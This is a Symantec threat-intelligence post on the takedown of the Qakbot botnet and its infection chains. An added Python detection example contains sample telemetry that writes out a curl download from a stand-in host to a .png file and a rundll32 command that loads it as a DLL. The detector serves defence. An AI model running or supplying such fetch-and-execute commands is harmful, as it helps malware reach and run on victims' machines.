Threat Intelligence

Qakbot: Takedown Operation Dismantles Botnet Infrastructure

Botnet was one of the most prolific malware distribution networks.

A major international law enforcement operation has disrupted the notorious Qakbot botnet and taken much of its infrastructure offline. Led by the U.S. Federal Bureau of Investigation (FBI) and Justice Department and involving agencies from France, Germany, the Netherlands, the UK, Romania, and Latvia, the operation has resulted in the deletion of the Qakbot malware from more than 700,000 victims' computers and the seizure of $8.6 million in cryptocurrency that is suspected to be the proceeds of cybercrime.

The takedown operation saw the FBI obtaining access to Qakbot infrastructure, which allowed it to identify more than 700,000 infections and redirect the botnet’s traffic to servers controlled by the agency. An uninstaller was then distributed that removed the infected computers from the botnet.

Background

Qakbot is operated by a cybercrime group that Symantec, part of Broadcom, calls Batbug. The malware is one of the most enduring threats, having first appeared in 2007. Like several similar malware families, Qakbot started life as a banking Trojan and, aside from its prevalence, became known for its functionality and adaptability. For example, once it infected one machine in an organization, it was able to spread laterally across the network using worm-like functionality: brute-forcing network shares and Active Directory user group accounts, or exploiting Server Message Block (SMB).

Qakbot is largely spread via email. While it was once delivered by the Emotet botnet, Qakbot is now usually delivered directly via email spam runs, suggesting its operators acquired access to spamming infrastructure following Emotet’s disappearance. These emails may include a malicious link or attachment, and the subject lines generally refer to popular lure subjects such as shipping updates, work orders, urgent requests, invoices, and claims.

Recent Activity

In recent years, Qakbot has become closely associated with ransomware activity with Qakbot infections acting as the initial breach that ultimately leads to ransomware deployment on an organization’s network. Qakbot has been associated with multiple ransomware operations in recent years, including Sodinokibi, Egregor, ProLock, and MountLocker. Most recently, it has been seen collaborating with the BlackBasta ransomware operation. 

Activity by Qakbot stepped up significantly from January 2023, when its malicious emails leveraged Microsoft OneNote attachments to drop Qakbot on infected machines. OneNote is a desktop digital notebook application that is installed by default in all Microsoft Office/365 installations. Even if a Windows user does not typically use the application, it is still available to open the file format. 

The malicious emails contained an embedded URL which, when clicked, led to a ZIP archive containing a malicious OneNote file. Opening this file led to the execution of an HTML Application (HTA) file, which ultimately caused a Qakbot DLL to be downloaded onto the victim's machine. The DLL was downloaded as a .png file via curl before being loaded by rundll32.exe.
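The chain above ends with curl saving the Qakbot DLL under a .png name and rundll32.exe loading that file. The Python below is an added example, not part of Symantec's post, of correlating those two steps in process-creation telemetry; the event schema, paths, host names and export name are constructed for illustration and are not indicators from the post.

```python
import re
from dataclasses import dataclass

@dataclass
class ProcEvent:
    """One process-creation record (assumed schema; map to your EDR/Sysmon fields)."""
    pid: int
    process: str   # image file name, lower-case
    cmdline: str

# curl told to save its download under a .png name (-o / --output); the flag is
# matched case-sensitively so that -O (remote-name) does not trigger it.
CURL_PNG = re.compile(r'(?:-o|--output)\s+"?([^\s"]+\.[pP][nN][gG])')
# rundll32 handed a .png path as the module to load, optionally "path",Export
RUNDLL_PNG = re.compile(r'rundll32(?:\.exe)?\s+"?([^\s",]+\.png)', re.IGNORECASE)

def find_png_dll_loads(events):
    """Return (curl_pid, rundll32_pid) pairs where a file that curl wrote with a
    .png extension is later passed to rundll32.exe. Correlation is on the file
    path rather than process ancestry, so it still fires when the HTA stage
    launches the two tools as siblings instead of parent and child."""
    downloaded = {}   # lower-cased path -> pid of the curl that wrote it
    hits = []
    for ev in events:
        if ev.process == "curl.exe":
            m = CURL_PNG.search(ev.cmdline)
            if m:
                downloaded[m.group(1).lower()] = ev.pid
        elif ev.process == "rundll32.exe":
            m = RUNDLL_PNG.search(ev.cmdline)
            if m and m.group(1).lower() in downloaded:
                hits.append((downloaded[m.group(1).lower()], ev.pid))
    return hits

# Constructed sample telemetry mirroring the chain in the post.
SAMPLE_EVENTS = [
    ProcEvent(101, "onenote.exe", r'"C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE" C:\Users\u\Downloads\Invoice.one'),
    ProcEvent(102, "mshta.exe", r'mshta.exe C:\Users\u\AppData\Local\Temp\open.hta'),
    ProcEvent(103, "curl.exe", r'curl.exe -o C:\Users\Public\img.png http://example.invalid/x'),
    ProcEvent(104, "rundll32.exe", r'rundll32.exe "C:\Users\Public\IMG.png",Wind'),
    # benign noise: a real image fetched by curl and never executed, and a normal rundll32 use
    ProcEvent(105, "curl.exe", r'curl.exe -o C:\Users\u\logo.png http://example.invalid/logo.png'),
    ProcEvent(106, "rundll32.exe", r'rundll32.exe shell32.dll,Control_RunDLL'),
]

if __name__ == "__main__":
    for curl_pid, run_pid in find_png_dll_loads(SAMPLE_EVENTS):
        print(f"suspect: curl pid {curl_pid} wrote a .png that rundll32 pid {run_pid} loaded")
```

Path matching is case-insensitive because NTFS is; extending the key to include the writing host or user is a natural next step when the telemetry spans many machines.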

There were indications in at least one Qakbot attack observed by Symantec that the initial access vector may have been malvertising. The attack chain in that instance began with the victim visiting a malicious website on the Chrome browser. This coincided with reports about malware, including IcedID, being spread via ads on Google. 

This surge in Qakbot activity appeared to last until June 2023. The attackers made frequent tweaks to their attack chain, likely in a bid to evade detection. OneNote files were eventually abandoned and by June the attackers were largely favoring PDF documents, which led to URLs from which malicious ZIP archives containing JavaScript downloaders were downloaded. 

It is unclear yet whether Qakbot's sudden cessation of activity in June was linked to this takedown operation.

Significant blow

Batbug has long been one of the largest players in the cybercrime landscape, controlling a lucrative malware distribution network that was linked to multiple major ransomware gangs. This takedown is likely to disrupt Batbug’s operations and it is possible that the group may struggle to rebuild its infrastructure in its aftermath.

Protection/Mitigation

For the latest protection updates, please visit the Symantec Protection Bulletin.

About the Author

Threat Hunter Team

Symantec

The Threat Hunter Team is a group of security experts within Symantec whose mission is to investigate targeted attacks, drive enhanced protection in Symantec products, and offer analysis that helps customers respond to attacks.
